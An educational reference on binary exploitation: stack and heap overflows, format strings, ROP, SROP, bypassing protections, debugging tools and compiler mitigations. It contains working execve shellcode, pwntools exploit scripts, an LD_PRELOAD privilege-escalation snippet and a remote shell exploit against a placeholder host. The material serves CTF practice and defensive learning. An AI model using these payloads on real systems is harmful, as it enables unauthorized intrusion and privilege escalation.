Introduction to Binary Exploitation
Binary exploitation is the process of finding and leveraging vulnerabilities in compiled programs to achieve unauthorized behavior—typically gaining control of a system or escalating privileges. This field combines knowledge of computer architecture, operating systems, assembly language, and memory management to identify and exploit flaws in executable code. Understanding binary exploitation is crucial for both cybersecurity professionals seeking to secure systems and ethical hackers conducting penetration testing or participating in CTF (Capture The Flag) competitions.
Core Concepts and Terminology
Memory Layout
Section | Description | Permissions |
---|---|---|
Text/Code | Executable instructions | Read, Execute |
Data | Initialized global/static variables | Read, Write |
BSS | Uninitialized global/static variables | Read, Write |
Heap | Dynamic memory allocation | Read, Write |
Stack | Local variables, function calls | Read, Write |
Process Memory Map
High addresses ↑
+----------------+
| Command-line |
| arguments and |
| environment |
+----------------+
| Stack | ← Grows downward
| ↓ |
+----------------+
| ↑ |
| Heap | ← Grows upward
+----------------+
| Uninitialized |
| data (BSS) |
+----------------+
| Initialized |
| data |
+----------------+
| Text/Code |
+----------------+
Low addresses ↓
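On Linux, the layout above can be seen for a live process in /proc/<pid>/maps. The following is a minimal sketch of how such lines can be parsed; the sample lines and their addresses are made up for illustration, and `parse_maps_line` is a hypothetical helper name.

```python
def parse_maps_line(line):
    """Split one /proc/<pid>/maps line into start, end, permissions, and path."""
    fields = line.split()
    start_hex, end_hex = fields[0].split("-")
    path = fields[5] if len(fields) > 5 else ""
    return int(start_hex, 16), int(end_hex, 16), fields[1], path

# Sample lines in the /proc/<pid>/maps format (addresses are invented)
SAMPLE = """\
00400000-00401000 r-xp 00000000 08:01 131 /tmp/vulnerable
00601000-00602000 rw-p 00001000 08:01 131 /tmp/vulnerable
01c3b000-01c5c000 rw-p 00000000 00:00 0 [heap]
7ffd4a1e0000-7ffd4a201000 rw-p 00000000 00:00 0 [stack]
"""

regions = [parse_maps_line(line) for line in SAMPLE.splitlines()]
for start, end, perms, path in regions:
    print(f"{start:#014x}-{end:#014x} {perms} {path}")
```

In this sample the text mapping is readable and executable but not writable, while the heap and stack are writable but not executable, matching the permissions table.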
Important CPU Registers (x86/x86-64)
x86 Register | x86-64 Register | Purpose |
---|---|---|
EIP | RIP | Instruction Pointer |
ESP | RSP | Stack Pointer |
EBP | RBP | Base Pointer |
EAX, EBX, ECX, EDX | RAX, RBX, RCX, RDX | General Purpose Registers |
ESI, EDI | RSI, RDI | Source/Destination Index |
– | R8-R15 | Additional Registers (x86-64 only) |
Buffer Overflow Exploitation
Basic Buffer Overflow Concepts
- Stack Buffer Overflow: Occurs when data written to a buffer on the stack exceeds the allocated space
- Heap Buffer Overflow: Occurs when a buffer on the heap is overflowed
- Return Address Overwrite: Changing the saved return address on the stack to control execution flow
- Shellcode: Machine code that can be used as the payload in an exploit
Stack Buffer Overflow Example
// Vulnerable code
#include <string.h>
void vulnerable_function(char *input) {
char buffer[64];
strcpy(buffer, input); // No bounds checking!
}
int main(int argc, char *argv[]) {
vulnerable_function(argv[1]);
return 0;
}
Stack Layout During Function Call
High addresses ↑
+------------------+
| Function |
| arguments |
+------------------+
| Return address | ← Overwrite this to control execution flow
+------------------+
| Saved EBP/RBP |
+------------------+
| Local variables | ← Buffer starts here
| |
+------------------+
Low addresses ↓
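The stack layout above suggests the shape of an overflow payload: filler for the buffer, a value for the saved base pointer, then the new return address. A minimal sketch for x86-64 follows. It assumes there is no padding between the buffer and the saved RBP (this depends on the compiler); `build_overflow` is a hypothetical helper and 0x4011cb is only an example address.

```python
import struct

def build_overflow(buf_len, ret_addr, saved_bp=b"B" * 8):
    """Filler for the buffer, then the saved RBP slot, then the new return address."""
    return b"A" * buf_len + saved_bp + struct.pack("<Q", ret_addr)

# 64-byte buffer, as in the vulnerable function; the address is an assumption
payload = build_overflow(64, 0x4011cb)
print(len(payload))        # 64 + 8 + 8 bytes
print(payload[72:].hex())  # return address in little-endian byte order
```

The return address therefore starts 72 bytes into the input under these assumptions; on a real target the offset should be measured rather than computed.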
Basic Exploitation Steps
- Identify vulnerability: Find buffer overflow opportunity
- Determine offset: Find exact bytes needed to reach return address
# Create pattern
msf-pattern_create -l 100
# Find offset from crash
msf-pattern_offset -q 0x41384142
- Craft payload: Shellcode + address to jump to
- Deliver exploit: Send crafted input to vulnerable program
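The offset-finding step can be sketched in plain Python. This is an illustrative reimplementation of the "Aa0Aa1Aa2..." pattern style, not the Metasploit source; `pattern_create` and `pattern_offset` are hypothetical names, and the crash value is assumed to be a 32-bit little-endian register value.

```python
import string
import struct
from itertools import product

def pattern_create(length):
    """Build an 'Aa0Aa1Aa2...' pattern in the style of msf-pattern_create."""
    triples = product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    out = ""
    for upper, lower, digit in triples:
        if len(out) >= length:
            break
        out += upper + lower + digit
    return out[:length].encode()

def pattern_offset(value, length=8192):
    """Return the first offset of a 32-bit little-endian value in the pattern, or -1."""
    return pattern_create(length).find(struct.pack("<I", value))

pattern = pattern_create(100)
# Pretend the program crashed with the four bytes at offset 72 in the instruction pointer
crash_value = struct.unpack("<I", pattern[72:76])[0]
print(pattern_offset(crash_value, 100))
```

The value reported by the debugger is converted back to bytes in little-endian order before searching, which is why the register contents look reversed relative to the pattern text.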
Shellcode Examples
# Linux x86 - execve("/bin//sh", ["/bin//sh"], envp) - 23 bytes (EDX, the envp argument, is not cleared)
shellcode = (
b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
b"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
# Linux x86-64 - execve("/bin//sh", NULL, NULL) - 31 bytes
shellcode = (
b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0"
b"\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53"
b"\x48\x89\xe7\xb0\x3b\x0f\x05"
)
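Before using shellcode it is worth checking its length and whether it contains bytes that the vulnerable copy routine would stop on (a NUL byte ends a strcpy() copy, for example). A small sketch of that check follows; the set of forbidden bytes is an assumption and depends on how the target reads its input.

```python
X86_SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    b"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
X64_SHELLCODE = (
    b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0"
    b"\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53"
    b"\x48\x89\xe7\xb0\x3b\x0f\x05"
)

def bad_bytes(shellcode, forbidden=b"\x00\n"):
    """Return the sorted forbidden byte values that occur in the shellcode."""
    return sorted({b for b in shellcode if b in forbidden})

for name, code in (("x86", X86_SHELLCODE), ("x86-64", X64_SHELLCODE)):
    print(name, len(code), "bytes, bad bytes:", bad_bytes(code))
```

Both byte strings are free of NUL and newline bytes, which is why they push "/bin//sh" (eight bytes) instead of a NUL-padded "/bin/sh".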
Memory Corruption Techniques
Return-Oriented Programming (ROP)
ROP chains together existing code fragments (gadgets) ending in ret instructions to execute arbitrary operations, bypassing non-executable stack protections.
Finding ROP Gadgets
# Using ROPgadget
ROPgadget --binary ./vulnerable_program --only "pop|ret"
# Using ropper
ropper --file ./vulnerable_program --search "pop rdi"
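At their core, gadget finders search executable bytes for instruction sequences that end in ret. The sketch below looks only for the two-byte encoding of pop rdi; ret (5f c3) in a byte string; the sample bytes and the base address are invented, and real tools disassemble backwards from every ret rather than matching one fixed pattern.

```python
def find_bytes(blob, pattern, base=0):
    """Return the address of every occurrence of pattern in blob."""
    hits = []
    index = blob.find(pattern)
    while index != -1:
        hits.append(base + index)
        index = blob.find(pattern, index + 1)
    return hits

POP_RDI_RET = b"\x5f\xc3"  # pop rdi; ret

# Invented code bytes: push rbp; mov rbp,rsp; pop r15; ret; nop; pop rdi; ret
code = bytes.fromhex("554889e5415fc3905fc3")

for addr in find_bytes(code, POP_RDI_RET, base=0x401000):
    print(hex(addr))
```

The first hit lands in the middle of pop r15; ret (41 5f c3): skipping the 41 prefix byte yields a valid pop rdi; ret, which is why such gadgets exist even in binaries that never use that instruction directly.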
Simple ROP Chain Example (x86-64)
from pwn import *
# Addresses from binary
pop_rdi_ret = 0x4011cb
system_plt = 0x401030
bin_sh_str = 0x402000
# Craft ROP chain
payload = b"A" * 72 # Padding to reach return address
payload += p64(pop_rdi_ret) # Gadget: pop rdi; ret
payload += p64(bin_sh_str) # "/bin/sh" string address
payload += p64(system_plt) # system() function
Format String Vulnerabilities
Format string vulnerabilities occur when user input is directly used as the format string in functions like printf().
Example of Vulnerable Code
void vulnerable_function(char *input) {
printf(input); // Vulnerable - should be printf("%s", input)
}
Format String Attack Techniques
Information Leak: Reading from arbitrary memory
%x %x %x %x   // Leak values from stack
%s            // Read string from memory address on stack
Memory Write: Writing to arbitrary memory
%n     // Write number of bytes printed so far to address
%hn    // Write short integer
%hhn   // Write byte
Format String Exploit Example
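# Write 0x41414141 to address 0xffffd8ac (32-bit target)
payload = p32(0xffffd8ac)    # Address to write to (4 bytes of output so far)
payload += b"%1094795581x"   # Pad output to the desired value (0x41414141 - 4 = 1094795581)
payload += b"%1$n"           # Write the number of characters output so far; the argument index (1 here) depends on where the buffer sits on the stack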
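Printing over a billion characters for a single %n write is rarely practical, so the value is usually written one byte at a time with %hhn. The sketch below computes the padding needed before each write, using the fact that %hhn stores the output count modulo 256. `hhn_paddings` is a hypothetical helper, and the count of 16 bytes already printed assumes four 4-byte addresses at the start of the payload.

```python
def hhn_paddings(value, already_printed, nbytes=4):
    """Pad widths so that successive %hhn writes store value byte by byte (little-endian)."""
    pads = []
    count = already_printed
    for i in range(nbytes):
        target = (value >> (8 * i)) & 0xFF
        pad = (target - count) % 256  # %hhn keeps only the low 8 bits of the count
        pads.append(pad)
        count += pad
    return pads

print(hhn_paddings(0x41414141, already_printed=16))
print(hhn_paddings(0xDEADBEEF, already_printed=16))
```

A computed width of 0 means the count already has the right low byte, so that write needs no padding conversion in front of it.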
Heap Exploitation
Heap Manager Basics
- malloc/free: C functions for dynamic memory allocation/deallocation
- Chunks: Basic unit of allocated memory
- Bins: Free chunk collections (fast, small, large, unsorted)
- Metadata: Information about chunk size, usage status
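Chunk sizes matter because they decide which bin a freed chunk lands in. As a rough sketch, assuming 64-bit glibc (8-byte size field, 16-byte alignment, 32-byte minimum chunk), the chunk size for a malloc request can be computed as follows; `chunk_size` is a hypothetical helper name.

```python
SIZE_SZ = 8        # size of the chunk size field on 64-bit
ALIGNMENT = 16     # chunk sizes are multiples of 16
MIN_CHUNK = 32     # smallest possible chunk

def chunk_size(request):
    """Chunk size for a malloc(request) call under the assumptions above."""
    size = (request + SIZE_SZ + ALIGNMENT - 1) & ~(ALIGNMENT - 1)
    return max(size, MIN_CHUNK)

for request in (0, 10, 24, 25, 100):
    print(f"malloc({request}) -> chunk of {chunk_size(request):#x} bytes")
```

Under these assumptions malloc(10) and malloc(24) both produce a 0x20-byte chunk, so a chunk freed from one can be handed back for the other.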
Common Heap Vulnerabilities
Use-After-Free (UAF): Using memory after it’s been freed
char *ptr = malloc(10);
free(ptr);
strcpy(ptr, "Exploited!"); // UAF vulnerability
Double Free: Freeing the same memory twice
char *ptr = malloc(10);
free(ptr);
free(ptr); // Double free vulnerability
Heap Overflow: Buffer overflow on heap-allocated memory
char *ptr = malloc(10);
strcpy(ptr, "AAAAAAAAAAAAAAAAAA"); // Overflows allocated chunk
Heap Exploitation Techniques
- Heap Spray: Filling the heap with malicious code/data
- Fastbin Dup: Exploiting double-free to control allocations
- Unlink Exploit: Overwriting metadata to control execution
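- House of Force: Overwriting the top chunk size so that malloc can return a chosen address
- House of Orange: Corrupting the top chunk size so it is freed into the unsorted bin without calling free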
Basic Heap Exploitation Example
# Simple UAF exploitation
from pwn import *
p = process('./vulnerable')
malicious_function = 0x401196 # Placeholder: address of the function to redirect to
# Trigger allocation and free
p.sendline(b"alloc") # Allocate chunk
p.sendline(b"free") # Free chunk but program keeps the pointer
# Write malicious data to control flow
p.sendline(b"write") # Write to freed chunk
p.sendline(b"A" * 8 + p64(malicious_function))
# Trigger vulnerability
p.sendline(b"use") # Use chunk, triggering call through modified function pointer
Protection Mechanisms and Bypasses
Address Space Layout Randomization (ASLR)
Protection: Randomizes memory addresses to prevent hardcoding addresses in exploits.
Bypass Techniques:
- Memory leaks to determine runtime addresses
- Partial overwrites or relative addressing when only some regions are randomized
- Brute force (for limited randomization)
- Return to PLT/GOT (fixed addresses in some cases)
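The leak-based bypass comes down to one subtraction: ASLR moves a whole module, so the distance between a symbol and the module base stays constant. A minimal sketch follows; the leaked address and symbol offsets are invented values, and `base_from_leak` is a hypothetical helper.

```python
PAGE_MASK = 0xFFF  # modules are mapped on 4 KiB page boundaries

def base_from_leak(leaked_addr, symbol_offset):
    """Recover a module base from one leaked symbol address."""
    base = leaked_addr - symbol_offset
    if base & PAGE_MASK:
        raise ValueError("base is not page-aligned; wrong offset or wrong library version?")
    return base

# Invented example: a leaked puts() address and offsets from a matching libc
leaked_puts = 0x7FFFF7E4A5A0
puts_offset = 0x805A0
system_offset = 0x50D60

libc_base = base_from_leak(leaked_puts, puts_offset)
print(hex(libc_base))
print(hex(libc_base + system_offset))  # runtime address of system()
```

The page-alignment check is a cheap sanity test: a base that does not end in 000 usually means the offsets come from a different libc build than the one on the target.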
Data Execution Prevention (DEP) / NX
Protection: Marks memory regions as non-executable to prevent code execution from data sections.
Bypass Techniques:
- Return-Oriented Programming (ROP)
- Jump-Oriented Programming (JOP)
- Return-to-libc attacks
- Overwriting function pointers
Stack Canaries
Protection: Random values placed between buffer and control data to detect overwrites.
Bypass Techniques:
- Information leaks to read the canary value
- Format string attacks to reveal canary
- Brute-forcing the canary byte-by-byte (forking servers reuse the same canary in every child, and a crash reveals a wrong guess)
- Alternative attack vectors (indirect overwrites)
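The byte-by-byte approach can be illustrated with a simulated target. In the sketch below, `make_oracle` stands in for a forking server that crashes when the overwritten canary bytes are wrong; it is a hypothetical stand-in, not a real network client, and the secret canary is an invented value with the leading NUL byte that Linux canaries typically have.

```python
def make_oracle(canary):
    """Simulate a forked child: it survives only if the overwritten prefix matches."""
    def survives(prefix):
        return canary.startswith(prefix)
    return survives

def brute_force_canary(survives, length=8):
    """Recover the canary one byte at a time, at most 256 guesses per byte."""
    known = b""
    for _ in range(length):
        for guess in range(256):
            if survives(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("no byte value survived; the canary may change per connection")
    return known

secret = b"\x00" + bytes.fromhex("a1b2c3d4e5f607")
recovered = brute_force_canary(make_oracle(secret))
print(recovered.hex())
```

Guessing one byte at a time needs at most 8 * 256 = 2048 attempts, compared with 2^64 for guessing the whole value at once.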
Relocation Read-Only (RELRO)
Protection: Protects ELF sections like GOT from being overwritten.
Levels:
- Partial RELRO: GOT is writable but other sections protected
- Full RELRO: Entire GOT is read-only
Bypass Techniques:
- For Partial RELRO: GOT overwrite still possible
- Use other attack vectors when Full RELRO is enabled
Position Independent Executable (PIE)
Protection: Code is position-independent, loaded at random address.
Bypass Techniques:
- Memory leaks to determine base address
- Relative code reuse
- Brute force (limited effectiveness)
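Whether a binary was built as PIE can be read from its ELF header: the e_type field is ET_DYN (3) for position-independent executables and ET_EXEC (2) for fixed-address ones. The sketch below checks that field on a synthetic header built in memory; `fake_header` is a hypothetical test helper, and note that shared libraries are also ET_DYN, so this is only a first indication.

```python
import struct

ET_EXEC, ET_DYN = 2, 3

def elf_type(header):
    """Return the e_type field from the first 18 bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    byte_order = "<" if header[5] == 1 else ">"  # EI_DATA: 1 means little-endian
    (e_type,) = struct.unpack_from(byte_order + "H", header, 16)
    return e_type

def looks_like_pie(header):
    return elf_type(header) == ET_DYN

def fake_header(e_type):
    # e_ident: magic, ELFCLASS64, little-endian, version 1, zero padding to 16 bytes
    return b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + struct.pack("<H", e_type)

print(looks_like_pie(fake_header(ET_DYN)))
print(looks_like_pie(fake_header(ET_EXEC)))
```

For a real file, the same function can be applied to the first 18 bytes read in binary mode, for example `open(path, "rb").read(18)`.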
Exploitation Tools and Framework Usage
GDB Extensions
PEDA (Python Exploit Development Assistance)
gdb -q ./vulnerable
gdb-peda$ pattern create 100 pattern
gdb-peda$ run `cat pattern`
gdb-peda$ pattern search
GEF (GDB Enhanced Features)
gdb -q ./vulnerable
gef➤ checksec
gef➤ heap chunks
gef➤ vmmap
pwndbg
gdb -q ./vulnerable
pwndbg> disass main
pwndbg> break *0x401234
pwndbg> context
Pwntools Framework (Python)
from pwn import *
# Configure context
context.arch = 'amd64'
context.log_level = 'debug'
# Connect to target
p = process('./vulnerable') # Local process
# p = remote('example.com', 1234) # Remote target
# Useful functions
elf = ELF('./vulnerable') # Load binary
libc = ELF('./libc.so.6') # Load library
# Address helpers
system_addr = elf.plt['system'] # PLT entry
binsh_addr = next(libc.search(b'/bin/sh\x00')) # Search for string
# Sending data
p.send(payload) # Send raw bytes
p.sendline(payload) # Send with newline
p.sendafter(b'Prompt: ', payload) # Wait for bytes then send
p.sendlineafter(b'Prompt: ', payload) # Wait for bytes then send with newline
# Receiving data
data = p.recv(nbytes=4) # Receive n bytes
data = p.recvline() # Receive until newline
data = p.recvuntil(b'marker') # Receive until specific bytes
data = p.clean() # Receive all available data
# Packing/unpacking addresses
addr_packed = p64(0x401234) # Pack as 64-bit value
addr_packed = p32(0x401234) # Pack as 32-bit value
value = u64(data.ljust(8, b'\x00')) # Unpack 64-bit value
value = u32(data.ljust(4, b'\x00')) # Unpack 32-bit value
# Interactive shell
p.interactive()
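The packing helpers are thin wrappers around little-endian integer encoding. As an illustration of what they do, the sketch below reproduces the 64-bit pair with the standard library; `pack64` and `unpack64` are hypothetical names chosen to avoid clashing with the pwntools functions.

```python
import struct

def pack64(value):
    """Encode an integer as 8 little-endian bytes, like p64()."""
    return struct.pack("<Q", value)

def unpack64(data):
    """Decode up to 8 little-endian bytes, padding short input with zeros."""
    return struct.unpack("<Q", data.ljust(8, b"\x00"))[0]

print(pack64(0x401234).hex())

# A leaked userspace pointer is often only 6 bytes long, because the
# top two bytes are zero and output functions stop at the first NUL
leak = b"\xa0\xa5\xe4\xf7\xff\x7f"
print(hex(unpack64(leak)))
```

The ljust() padding is what makes a 6-byte leak usable: without it, unpacking would fail because the input is shorter than 8 bytes.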
One Gadget RCE
Finding and using a "one gadget RCE" (execve("/bin/sh", …)) in libc:
# Find one gadget in libc
one_gadget libc.so.6
# Using one gadget in exploit
from pwn import *
p = process('./vulnerable')
libc = ELF('./libc.so.6')
# Leak libc base address (example)
p.recvuntil(b'Leak: ')
leak = int(p.recvline().strip(), 16)
libc_base = leak - libc.symbols['puts']
# Apply one gadget
one_gadget_offset = 0x4526a # From one_gadget output
one_gadget_addr = libc_base + one_gadget_offset
# Overwrite return address with one gadget
payload = b'A' * 64 # Padding up to the saved return address (offset is target-specific)
payload += p64(one_gadget_addr)
p.sendline(payload)
p.interactive()
Dynamic Analysis Techniques
Debugging Commands
Common GDB Commands
run [args] - Start program
break *0x12345 - Set breakpoint at address
break function_name - Set breakpoint at function
continue - Continue execution
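step - Step one source line, entering function calls (stepi steps one instruction)
next - Step one source line, stepping over function calls (nexti steps one instruction)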
finish - Run until current function returns
print $rax - Print register value
x/10wx $rsp - Examine memory (10 words in hex at rsp)
backtrace - Show call stack
info registers - Show all registers
disassemble main - Disassemble function
Memory Examination
x/10xg $rsp - Examine 10 giant words (8 bytes) in hex
x/20xw $rsp - Examine 20 words (4 bytes) in hex
x/40xh $rsp - Examine 40 half-words (2 bytes) in hex
x/80xb $rsp - Examine 80 bytes in hex
x/s $rdi - Examine memory as string
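The unit letters change how the same bytes are grouped and displayed, which matters on little-endian x86. As a rough illustration of what x/2xg shows, the sketch below formats a byte string as 8-byte little-endian words; the stack contents and base address are invented, and the output format only approximates GDB's.

```python
import struct

def giant_words(data, base=0):
    """Format data as 8-byte little-endian words, one per line."""
    lines = []
    usable = len(data) - len(data) % 8  # ignore a trailing partial word
    for offset in range(0, usable, 8):
        (word,) = struct.unpack_from("<Q", data, offset)
        lines.append(f"{base + offset:#x}: {word:#018x}")
    return lines

# Invented stack contents: eight filler bytes followed by a return address
stack = b"AAAAAAAA" + bytes.fromhex("cb11400000000000")
for line in giant_words(stack, base=0x7FFE0000):
    print(line)
```

The bytes cb 11 40 00 ... appear as 0x00000000004011cb when viewed as a giant word, while x/8xb on the same address would list them in memory order.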
Tracing and Monitoring
ltrace – Library call tracer
ltrace ./vulnerable argument
strace – System call tracer
strace ./vulnerable argument
Valgrind – Memory analysis tool
valgrind --leak-check=full ./vulnerable argument
Binary Analysis Tools
Static Analysis
Ghidra – NSA’s reverse engineering framework
ghidra & # Launch GUI, then import the binary and analyze
IDA Pro/Free – Interactive disassembler
ida64 vulnerable # Launch GUI
Radare2 – Reverse engineering framework
r2 ./vulnerable
[0x004010a0]> aaa # Analyze all
[0x004010a0]> afl # List functions
[0x004010a0]> s main # Seek to main
[0x004010a0]> pdf # Print disassembly
objdump – Disassemble binary files
objdump -d ./vulnerable # Disassemble
objdump -M intel -d ./vulnerable # With Intel syntax
Dynamic Analysis Tools
QEMU – For cross-architecture analysis
qemu-arm -L /usr/arm-linux-gnueabi ./arm_vulnerable
checksec – Check binary protections
checksec --file=./vulnerable
gdbserver – Remote debugging
gdbserver localhost:1234 ./vulnerable arg1 arg2
Real-world Exploitation Scenarios
Privilege Escalation via SUID Binary
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check for vulnerabilities
strings /usr/bin/vulnerable_suid
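# Exploit environment variables for library hijacking
# Note: the dynamic loader ignores LD_PRELOAD for SUID binaries (secure-execution mode)
# unless the library is in a trusted directory and is itself SUID, so this only works
# where the variable is passed through, e.g. sudo configured with env_keep+=LD_PRELOAD
cd /tmp
printf '#include <unistd.h>\nint system(const char *cmd) { return execl("/bin/sh", "sh", (char *)NULL); }\n' > evil.c
gcc -shared -o evil.so evil.c -fPIC
LD_PRELOAD=/tmp/evil.so /usr/bin/vulnerable_suid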
Web Application Binary Exploitation
CGI Binary Exploitation
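# Send crafted request to vulnerable CGI
# (raw bytes are piped in: shell command substitution drops NUL bytes, and Python 3 print() would re-encode \xcb)
python3 -c 'import sys; sys.stdout.buffer.write(b"A"*64 + b"\xcb\x11\x40\x00\x00\x00\x00\x00")' \
  | curl -X POST --data-binary @- "http://example.com/cgi-bin/vulnerable.cgi"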
Memory Corruption in Network Service
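from pwn import *
# Placeholder addresses; take them from the target binary
pop_rdi_ret = 0x4011cb
bin_sh_addr = 0x402000
system_addr = 0x401030
# Connect to service
r = remote('vulnerable.com', 1337)
# Send exploit: on x86-64 the first argument is passed in RDI, so a pop rdi gadget loads it
# (the padding length of 64 is target-specific)
r.send(b"A" * 64 + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr))
# Get shell
r.interactive()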
Defense and Mitigation Strategies
Compiler Protections
Enable all protections
gcc -O2 -D_FORTIFY_SOURCE=2 -o protected source.c -fstack-protector-all -pie -fPIE -Wl,-z,relro,-z,now
Key flags:
- -fstack-protector-all: Stack canaries
- -pie -fPIE: Position Independent Executable
- -Wl,-z,relro,-z,now: Full RELRO
- -D_FORTIFY_SOURCE=2: Buffer overflow checks
Secure Coding Practices
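- Use safer functions:
  - strncpy() instead of strcpy() (strncpy() does not NUL-terminate when the source fills the buffer, so terminate manually)
  - snprintf() instead of sprintf()
  - fgets() instead of gets()
- Validate input lengths before processing
- Use memory-safe languages where possible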
Runtime Protections
Address Sanitizer (ASAN)
gcc -o sanitized source.c -fsanitize=address
Undefined Behavior Sanitizer (UBSAN)
gcc -o sanitized source.c -fsanitize=undefined
Advanced Topics
Return-to-dl-resolve
Technique to call arbitrary libc functions without needing their addresses.
from pwn import *
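# Create a ret2dlresolve attack (elf and p set up as in the pwntools section;
# assumes the binary imports read() so the chain can stage its data)
rop = ROP(elf)
dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"])
rop.read(0, dlresolve.data_addr) # Read the forged structures into writable memory
rop.ret2dlresolve(dlresolve) # Invoke the resolver on the forged entry
# Build payload (64 is an assumed offset to the return address)
payload = fit({64: rop.chain()})
p.sendline(payload)
p.sendline(dlresolve.payload) # Consumed by the read() call in the chain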
SROP (Sigreturn-Oriented Programming)
Uses the kernel’s signal handling mechanism to control registers.
from pwn import *
context.arch = 'amd64'
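# Placeholder addresses; take them from the target binary
pop_rax_ret = 0x401001 # pop rax; ret gadget
syscall_addr = 0x401010 # syscall instruction
bin_sh_addr = 0x402000 # "/bin/sh" string
# Create a sigreturn frame
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = bin_sh_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_addr
# Build payload: RAX must hold SYS_rt_sigreturn when the first syscall runs,
# so that the kernel restores all registers from the frame that follows
payload = b'A' * 64 + p64(pop_rax_ret) + p64(int(constants.SYS_rt_sigreturn))
payload += p64(syscall_addr) + bytes(frame)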
Kernel Exploitation Basics
Finding kernel exploits
# Check kernel version
uname -a
# Check for kernel vulnerabilities
searchsploit linux kernel 5.4
Basic steps for kernel exploitation:
- Prepare exploit code
- Compile for target kernel
- Execute to trigger vulnerability
- Escalate privileges
Practice Resources
CTF Platforms
- pwnable.kr
- pwnable.tw
- ROP Emporium
- Hack The Box
- CTFtime – Calendar of upcoming CTFs
Learning Resources
- Exploit Education
- LiveOverflow YouTube Channel
- Nightmare – Binary exploitation course
- How2Heap – Heap exploitation examples
Books and References
- “Hacking: The Art of Exploitation” by Jon Erickson
- “Practical Binary Analysis” by Dennis Andriesse
- “The Shellcoder’s Handbook” by Chris Anley et al.
Remember: Always practice binary exploitation legally and ethically. Only exploit systems you have permission to test, and follow responsible disclosure practices when discovering vulnerabilities in real-world software.